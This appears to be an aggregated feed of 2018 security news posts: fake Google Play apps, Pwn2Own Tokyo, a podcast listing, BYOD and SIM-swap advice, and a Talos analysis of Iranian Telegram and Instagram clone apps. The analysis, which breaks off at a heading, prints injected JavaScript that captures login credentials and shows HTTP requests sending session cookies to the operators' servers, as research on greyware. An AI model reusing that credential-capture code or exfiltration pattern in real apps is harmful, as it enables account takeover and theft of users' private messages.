The post 13 fraudulent apps into Google Play have been downloaded 560,000+ times appeared first on Security Affairs.

13 Malware-Laden Fake Apps on Google Play

A security researcher used Twitter to warn users about about malware embedded in fake apps available on Google Play. Lukas Stefanko, malware researcher at ESET, reported the malicious apps to

The post 13 Malware-Laden Fake Apps on Google Play appeared first on The Cyber Security Place.

Malvertising in Apple Pay Targets iPhone Users

The Media Trust has discovered a recent malvertising campaign involving Apple Pay that is part of a large-scale phishing and redirect campaign targeting iPhone users visiting premium newspapers and magazines.

The post Malvertising in Apple Pay Targets iPhone Users appeared first on The Cyber Security Place.

Major SMS Leak Exposed Millions Of Messages

Two-factor authentication codes were also exposed in Voxox leak. A huge database with user names, smartphone numbers, SMS messages and even two-factor authentication codes has been exposed, putting personal details at

The post Major SMS Leak Exposed Millions Of Messages appeared first on The Cyber Security Place.

BYOD Posing Major Mobile Security Risks

More and more organisations are allowing employees to bring their own devices for work. More than four in five organisations allow their employees to bring their own devices (BYOD) to

The post BYOD Posing Major Mobile Security Risks appeared first on The Cyber Security Place.

Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000

The Zero Day Initiative’s Pwn2Own Tokyo 2018 is a success, participants earned over $300,000 for disclosing flaws affecting iPhone X, Xiaomi Mi 6 and Samsung Galaxy S9 smartphones.

During the first day of the Pwn2Own Tokyo 2018 contest, participants hacked Apple iPhone X, Samsung Galaxy S9 and Xiaomi Mi 6 devices earning more than $225,000.

The novelty for this Pwn2Own edition was the creation of a specific session for IoT devices.

Pwn2Own Tokyo 2018

On the second day, the organizers only paid $100,000 for one iPhone and two Xiaomi hacks.

The day began with the success of the Team Fluoroacetate composed of Amat Cama and Richard Zhu, who hacked an iPhone X exploiting a Just-In-Time (JIT) bug and an out-of-bounds access flaw.

The team received $50,000 to have exfiltrate data from the device, they successfully stole a previously deleted photo from the targeted device.

Team Fluoroacetate also failed to demonstrate a baseband exploit targeting the iPhone X within the allotted time, but the experts successfully exploited an integer overflow in the JavaScript engine of the Xiaomi web browser to exfiltrate a picture from the phone.

They earned $25,000 USD and 6 Master of Pwn points.

F-Secure’s MWR Labs (Georgi Geshev, Fabi Beterke, and Rob Miller) also failed in hacking the iPhone X in the browser category, they were not able to use their exploit chain within the allotted time.

LaterMWR Labs hacked the Xiaomi Mi6 in the browser category using a download bug along with a silent app installation to load their custom app and exfiltrate pictures.

They earned another $25,000 USD and 6 more Master of Pwn points.

The organizers reported the flaws to their respective vendors, they paid out a total of $325,000 for 18 zero-days, $110,000 was for iPhone X exploits.

The flaws could be used by a persistent attacker or a surveillance firm to compromise the target device via its browser or Wi-Fi, their value is much greater in the cybercrime underground.

“Overall, we awarded $325,000 USD total over the two day contest purchasing 18 0-day exploits. Onsite vendors have received the details of these bugs and now have 90 days to produce security patches to address the bugs we reported. Once these are made public, stay tuned to this blog for more details about some of the best and most interesting bugs we saw this week.” concludes the official page for the Pwn2Own Tokyo 2018.

Pierluigi Paganini

(Security Affairs – Pwn2Own Tokyo 2018, hacking)

The post Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000 appeared first on Security Affairs.

Beers with Talos Ep. #41: Sex, money and malware



Beers with Talos (BWT) Podcast Ep. #41 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #41 show notes: 

Recorded Nov. 9, 2018 — We tried to make this episode last week, but thanks to some technical difficulties, we ended up calling that one a practice run. Here is take two, focused on recent sextortion scams and the pending machine learning apocalypse. We also review why vulnerability discovery and red teams are the most import line items in your security budget by looking a recent story where a breach cost dozens of lives.

The timeline:

The topics

00:38 — Roundtable: We are now trivia-worthy
12:25 — Persian Stalker and on down the mobile rabbit hole
22:45 — The anatomy of sextortion scams
31:32 — Machine learning and the malware wars
45:20 — Vulnerability discovery: Why our 200-vuln milestone is both important and amazing
52:32 —Save the red team, CIA covert comms cover blown
1:02:49 — Closing thoughts and parting shots

The links

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Top 10 Tips for Securing Your Mobile Devices and Sensitive Client Data

Do you have employees who bring mobile phones to work and use those devices on the corporate network? Do they store company data on these “Bring Your Own Devices (BYOD)”?? Does your company have a policy in place for this?

First, the moment a person brings in their personal phone to work, there is a fusion of personal and business tasks that occur. And, equally as bad, company issued devices are used for personal use as much, if not more than the employees own devices. Not sure you believe this? Here are some stats:

A recent survey asked 2,000 office workers about their habit of using their personal mobile devices at work. Here’s what it found:

  • 73% of people admit to downloading personal apps to tablets they got from their company.
  • 62% of people admit to downloading personal apps to mobile phones they got from their company.
  • 45% of people admit to downloading personal apps to notebooks they got from their company.
  • The people who were most likely to do this were in the 25 to 38-year-old age group.
  • 90% of people use their personal mobile devices to conduct business for work.

As you can see, a lot of people are using their mobile devices on the job, and this could not only put your company data at risk, but also the data associated with your clients. Do you have a plan to minimize or even totally prevent how much sensitive company data is wide open to hackers?

Solutions to Keep Sensitive Business Information Safe

Decision makers and business owners should always consider their personal devices as equal to any business device. You definitely don’t want your sensitive company information out there, and this information is often contained on your personal mobile or laptop device. Here are some things that you can do to keep this information safe:

Give Your Staff Information About Phishing Scams

Phishing is a method that cybercriminals use to steal data from companies. Studies show that it is extremely easy for even the smartest employees to fall for these tricks. Here’s how they work: a staff member gets an email with a sense of urgency. Inside the email is a link. The body of the email encourages the reader to click the link. When they do, they are taken to a website that either installs a virus onto the network or tricks the employee into giving out important company information.

Inform Your Staff that the Bad Guys Might Pose as Someone They Know

Even if you tell your staff about phishing, they can still get tricked into clicking an email link. How? Because the bad guys make these emails really convincing. Hackers do their research, and they are often skilled in the principles of influence and the psychology of persuasion. So, they can easily create fake emails that look like they come from your CEO or a vendor, someone your staff trusts. With this in mind, it might be best to create a policy where employees are no longer allowed to click email links. Pick up the phone to confirm that whatever an email is requesting, that the person who sent it is legitimate.

Teach Employees that Freebies aren’t Always Goodies

A lot of hackers use the promise of something free to get clicks. Make sure your staff knows to never click on an email link promising a freebie of any kind.

Don’t Buy Apps from Third-Party Sources

Apps are quite popular, and there are many that can help to boost productivity in a business setting. However, Apple devices that are “jailbroken” or Android devices that are “rooted” are outside of the walled garden of their respective stores and susceptible to malicious viruses. Make sure your employees know that they should never buy an app from a third-party source. Only use the official Apple App Store or the Google Play Store.

Always Protect Devices

It’s also important that you advise your employees to keep their devices protected with a password. These devices are easy to steal since they are so small. If there is no password, there is nothing stopping a bad guy from getting into them and accessing all of the accounts that are currently logged into the device.

Install a Wipe Function on All Mobile Devices Used for Business

You should also require all employees to have a “wipe” function on their phones. Even if they are only doing something simple, like checking their work email on their personal mobile device, it could get into the wrong hands. With the “wipe” function, the entire phone can be cleared remotely. You should also require employees to use the setting that erases the phone after a set number of password attempts.

Require that All Mobile Devices on the Company Network Use Anti-Virus Software

It’s also important, especially in the case of Android devices, that all mobile devices on the network have some type of anti-virus software.

Do Not Allow Any Jailbroken Devices on Your Company’s Network

Jailbroken devices are much more vulnerable to viruses and other malware. So, never allow an employee with a jailbroken phone to connect to your network.

All Employees Should Activate Update Alerts

One of the easiest ways to keep mobile devices safe is to keep them updated. So, make sure that all employees have update alerts enabled, and make sure that they are updating their devices when prompted or automatically.

Teach Employees About the Dangers of Public Wi-Fi

Finally, make sure your staff knows the dangers of using public Wi-Fi. Public Wi-Fi connections are not secure, so when connected, your devices are pretty open. That means, if you are doing things that are sensitive, such as logging into company accounting records, a hacker can easily follow. Instead, urge employees to use a VPN. These services are inexpensive and they encrypt data so hackers can’t access it.

He is the founder of Safr.me a cybersecurity speaking and consulting firm based in Massachussets. http://www.safr.me

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

How to Stop Mobile Apps That Steal

Smartphones are motivating targets for cybercriminals. Mobile devices today hold personal and monetizable data such as login credentials, financial information and company secrets — not to mention spy-friendly sensors such as microphones, cameras and location electronics.

Unsavory actors gain access to phones through breaches, physical access to the device or, increasingly, by hiding code in mobile apps that “phones home” and sends target data back to the perpetrator. This method is especially attractive for criminals because users are in control of app installations and physically carry phones right inside company firewalls.

How to Recognize App Fraud

Malicious exfiltration often originates in fraudulent apps. The Slovakian cybersecurity company ESET recently discovered six fake banking apps on the Google Play store, according to Reuters. The developers spoofed banking apps from financial institutions across multiple countries and stole credit card details and login credentials.

Trustlook Labs also discovered an Android Trojan hidden inside an app called Cloud Module, which obfuscates its existence to evade detection. The app stealthily steals data from mobile messaging apps, including Facebook Messenger, Twitter, Viber and Skype.

Fraudulent apps are often found in legitimate app stores, but an entire fraudulent app store recently emerged, according to Talos Intelligence. Called Google Play Market, the app was designed to mimic the actual Google Play Store. It tries to trick users into asking permission to gain administrator privileges and access settings, passwords and contacts.

Second-Guess the Popular Mobile Apps

According to GuardianApp, researchers discovered a series of legitimate and even popular apps extracting data. The No. 1 mapping app for finding gas prices, which claims 70 million users, and the No. 2 weather app were among the apps that contained the exfiltration code.

At least two dozen of these iOS apps were sharing location data (GPS, Wi-Fi and Bluetooth location) with companies that sell location information without the knowledge or permission of users. Some apps also shared other data, including browser histories, accelerometer data, cellular network name, GPS altitude and speed, and other data.

The firms selling the data are reportedly paying developers to install code that collects information, which they often say is used in an aggregated and anonymized form for market research services. To the app developers, it’s a way to monetize their apps. Many of these apps have even explicitly said location data will not be shared.

Understand the Threat

Far too often, these apps escape scrutiny because they sound so harmless, but it could be dangerous to underestimate their damage. Let’s say, for example, that an exfiltration app harvests only anonymized location data. What could be the harm in that?

A popular app could be used by dozens, hundreds or even thousands of users within one organization. By analyzing the location data, it would be easy to discover that some number of victims work at a specific company, because many of them spend their days in the company building.

All those users could fall victim to phishing attacks designed to target employees of that company. Further, those anonymous users at that company could be scrutinized based on where they live, which employees spend time together, what their hobbies are, whether they have children, where they shop and other data, based purely on where they go and when.

When personal information is used to construct victim profiles, phishing attacks can be far more effective. For example, let’s say 20 people at a company are found to be the parents of kids at a specific school. Scammers could blast the entire company email roster with an urgent message that sounds personalized because it specifically mentions both the company and the school, and maybe even the principle of the school. Although a generic phishing attack will likely have a relatively low success rate, a small number of those parents are sure to be duped, if only for a second. But that’s all it takes; once clicked, the payload is delivered and the damage begins.

Why You Should Invest in UEM and User Education

Although all of the malicious apps mentioned above have been removed from their app stores, as with most security threats, they were discovered only long after the damage was done. Two key actions are required to head off future risk from exfiltration apps.

First, adopt a unified endpoint management (UEM) solution that leverages artificial intelligence to spot anomalous and potentially malicious patterns. This should provide a safety net when human judgment fails.

Next, educate employees on how to spot apps that may contain exfiltration code to get ahead of human error. Data thieves are counting on user ignorance. In your training, be sure to include the following mobile security tips:

  • Discourage anyone in the organization from installing obscure apps, since they are more likely to escape app store scrutiny.
  • Avoid apps that are highly rated but have a small number of downloads, since fake accounts and bots can be used to inflate ratings.
  • Fake apps often have similar logos to the ones they’re imitating, but can contain typos in the descriptions and other telltale signs.
  • Always check the “Details” under app permissions before installation to see what permissions will be requested.
  • User agreements can sometimes reveal nefarious intent. If the end user license agreement (EULA) for a flashlight app asserts the right to use location and other irrelevant data, be suspicious.
  • Finally, do a search on the web for the name of the app to you intend download to see what other users and organizations are saying about it.

The arms race between threat actors and enterprise security professionals will continue, and it’s an uneven playing field. A malicious actor only needs to find one innovative way inside the organization. A security professional needs to guard against all possible attacks.

We can’t know exactly where the next attack will come from — but we do know that smartphone apps are among the best ways to smuggle payloads into an organization. As these threats proliferate, organizations will need to learn how to recognize app fraud on the fly and proactively defend against malicious applications to keep their data, employees and customers safe.

The post How to Stop Mobile Apps That Steal appeared first on Security Intelligence.

Smashing Security #103: An Instagram nightmare, crazy iPhone deaths, and election hack claims

Smashing Security #103: An Instagram nightmare, crazy iPhone deaths, and election hack claims

One travel blogger finds you don’t have to be Kylie Jenner to be targeted by an Instagram hacker. When 40 iPhones at a hospital mysteriously die, what could be the explanation? And, surprise surprise, political parties in the USA are throwing around hacking accusations.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Naked Security’s Mark Stockley.

The risk of using phone numbers as authenticators for sensitive information

The risk of using phone numbers as authenticators for sensitive information

Large companies are exposed to vulnerabilities that can cause serious financial losses – and some of these vulnerabilities come from apparently secure procedures. This has been highlighted by a recent lawsuit against AT&T for the theft of a total of 24 million dollars from one of the company’s clients, the cryptocurrency investor, Michael Terpin. Far from carrying out a highly complex attack that got through the firewalls and security barriers in the cryptocurrency platform or the telecommunications company, the attackers used an extremely simple attack vector: the victim’s phone number.

SIM cards are vulnerable

Terpin is basing his lawsuit on the responsibility the provider has for the double attack that he suffered: the first of the attacks used a SIM swap hack that gave the attacker access to his phone, and thus to all his applications for online services. In this context, SIM cards are essential in two factor authentication (2FA) processes. In theory, there can’t be two SIM cards with the same number at the same time; as such, the authentication of an online account using a phone number is an apparently secure process: the owner of the account receives the tokens – that is the access codes for the online account – generally via SMS, straight to their mobile.

However, there are times when the SIM card may not be under the control of its owner, either when the card has been lost or otherwise physically disabled. At this moment, the data can be transferred to a device belonging to someone else, who has usurped the real owner, whether intentionally or by mistake. According to the lawsuit, after the first SIM swap hack, an AT&T employee must have shared with an attacker one of the tokens received by Terpin on his phone to reactivate the SIM card.

This is how the second attack would have taken place: the attacker, after gaining control of the SIM and, as such, all of Terpin’s online accounts with 2FA, was able to access the cryptocurrency platform and in this way, extract his money. Terpin believes that the provider is negligent, both for the employee complicit in the theft, and for not cancelling the connection between his data and the SIM quickly enough to get ahead of the attacker.

In any case, he is not the first victim of this kind of attack, since 2FA is one of the most commonly used procedures in large companies for their online services. For this reason, many experts have cast doubt on the security of 2FA via mobile phones.

Given that users are entirely in the hands of their own devices and of the security measures of the telecoms operator, if this authentication is the only control measure, it can also be dangerous for large companies. Especially if employees use corporate mobiles that give them access to sensitive company information. As we mentioned in a previous blog post, directors are the largest risk for a company’s mobile security, and if, in addition, it is a large company, the losses stemming from an attack could run into millions.

Size matters

While it may sound surprising, it is large companies (not SMEs) that act worst when faced with cyberattacks and vulnerabilities. This is what is shown by the data in the report Penetration Risk Report, written by the cybersecurity advisor Coalfire.

The study shows that of the vulnerabilities found in large companies, 49% were deemed high risk, compared to 38% in SMEs. Among the most common vulnerabilities mentioned in the study were insecure protocols. This last case includes the security risks related to corporate mobile phones, such as SIM swat hacking, as happened to Terpin.

How can large companies minimize their mobile security risks?

As 2FA has been shown to be insufficient, employees should use authentication apps for their corporate devices. These apps generate a temporary 6 digit tokens linked to chosen accounts, which are automatically regenerated every 30 seconds, thus significantly reducing the options for attackers to take control of apps and services, even if they have managed to take over the SIM.

Another key measure for improving mobile security is to protect the corporate network itself: heads of security must provide workers with encrypted connections so that employees can securely access corporate systems remotely, using virtual private networks (VPNs).

Finally, it is vital that large companies have advanced cybersecurity solutions that offer detailed visibility of all the activity on endpoints, total control off all running processes and a reduction of the attack surface. Having a partner like Panda for Key Accounts is a guarantee of avoiding risks. We are allies of Key Accounts, with a department dedicated exclusively to providing support and specific solutions, as well as creating a security strategies for companies with over 5,000 workstations. We focus on what is most important: our strategy is aimed at protecting the endpoint, where all the employees’ and the company’s critical information is stored. In this way, we manage to keep any kind of attack, no matter how complex it may seem, from endangering companies.

The post The risk of using phone numbers as authenticators for sensitive information appeared first on Panda Security Mediacenter.

Persian Stalker pillages Iranian users of Instagram and Telegram

This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres, Vitor Ventura and with the contributions of Eric Kuhla.

Introduction

State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.

Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.
Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." It is not malicious enough to be classified as malware, but is suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically fulfills its functions that are expected by the user (ex. send messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.

Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while targeting secure messaging apps. Some actors are also hijacking the device's BGP protocol. This technique redirects the traffic of all routers, without the device considering the original of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and is easily detectable, so the new routes won't be in place for very long.

Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran and their nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.

A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. This same rule applies to the cloned applications, installing applications from untrusted sources implies a certain degree of risk that the users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.

Tactics

Functionality enhancement applications (grey)

Andromedaa.ir and Cambridge Universal Academy

Description of andromedaa.ir

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.

While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.

Whois information for andromedaa.ir

The andromedaa.ir domain is registered with the h0mayun@outlook.com email address. This is the same email address used to registered other domains for the cloned Instagram and Telegram applications (see other sections below).

Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.

A partial list of the domains found

We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.

Certificate information

This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based off the low prevalence of those values in the SSL certificate, Talos associates this domain to the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.

List of domains associated with the same IP address

Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.


Certificate information

Description of Cambridge Universal Academy

Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.



Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.

Business model


All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.

Price list (original HTML errors where kept, translation by google.com)

While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing highlights the benefits of using this service rather than others.

Lik3.org marketing (translation by google.com)

It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.

Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.

The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.

Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.

Application examples

Follower Begir Instagram iOS application

The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.

First screen after logging in

The developer added some features such as virtual currency and Persian language support, among others.

Certificate information

The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.

document.addEventListener('click', function() { 
    try { 
        var tu = document.querySelector('[name="username"]'); 
        var tp = document.querySelector('[name="password"]'); 
        var tpV = (typeof tp == 'undefined') ? '' : tp.value; 
        var tuV = (typeof tu == 'undefined') ? '' : tu.value; 
    } catch (err) { 
        var tuV = ''; 
        var tpV = ''    } 
    var bd = document.getElementsByTagName('body')[0].innerText; 
    var messageToPost = { 
        'pu': tuV, 
        'pp': tpV, 
        'bd': bd 
    }; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);


The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.

During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1 
Host: v1.flbgr.com 
SESSIONID: [redacted] 
HEADER: vf1IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Connection: close 
Accept: */* 
Accept-Language: fr-fr 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Encoding: gzip, deflate 
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.

The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.

The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:

POST /start/fl.php?apk=35&m=ios HTTP/1.1 
Host: ndrm.ir 
HEADER: vf1 
Connection: close 
IOS: 3361ba9ec3480bcd3766e07cf6b4068a 
Accept: */* 
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0 
Accept-Language: en-gb 
Accept-Encoding: gzip, deflate 
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:

Instructions to trust the developer certificate

The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.

Ozvbegir(ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.

Application description (translation by Google Translate)

We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.

Most recent Ozvbegir certificate

Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.

Older version's certificate

Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.

Ozvbegir classes structure

In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.


Update check and reply

Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.

The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and coincidently is the one with the ability to upgrade the application on mobile devices.

The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.


Phone number request

This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.


Sessions created on a single phone

The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1 
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1 
NUM: df27340104277f1e73142224d9cb59e8 
HEADER: bt6 
ADMIN: web 
Host: v1.ozvdarozv.com 
Connection: close 
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)


We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.


Channel information


Bitgram_dev

Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.

AseGram and BitGram on Google Play

Publisher information

Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.

Application examples



AseGram



The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.

AseGram certificate

This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.

Set proxy code


Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.

The service org.pouyadr.Service.MyService starts upon boot. This calls the MessagesController.getGlobalMainSettings() from the original Telegram package and will change the settings to include the proxy configuration.

The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.

The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. 

This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at cafebazaa.ir, an Iranian state-sanctioned Android application store.


Advanced Telegram cafebazaar page (translation by Google translate)

It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find an legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.

The application also contains code to use socks servers located in several countries, which can be used to circumvent the ban. However, during our research we have never seen these being used. On the other side, if the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.

Fake websites

Spoofed Telegram Websites

The most straightforward approach to gain access to an end user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.

Fake Telegram login page

This domain was registered on July 25, 2017. Based on the tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — nami.rosoki@gmail[.]com — used to register this domain, as well as other domains and its passive Domain Name Servers (pDNS) records suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears as though the website was built using the GitHub project called "Webogram," there were also strings in the source page to suggest this website's display was designed for iPhones.

Source code, GitHub.com reference

Newly identified Charming Kitten domains


While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," Which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same Modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.


This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.

BGP Routing Anomalies


Background


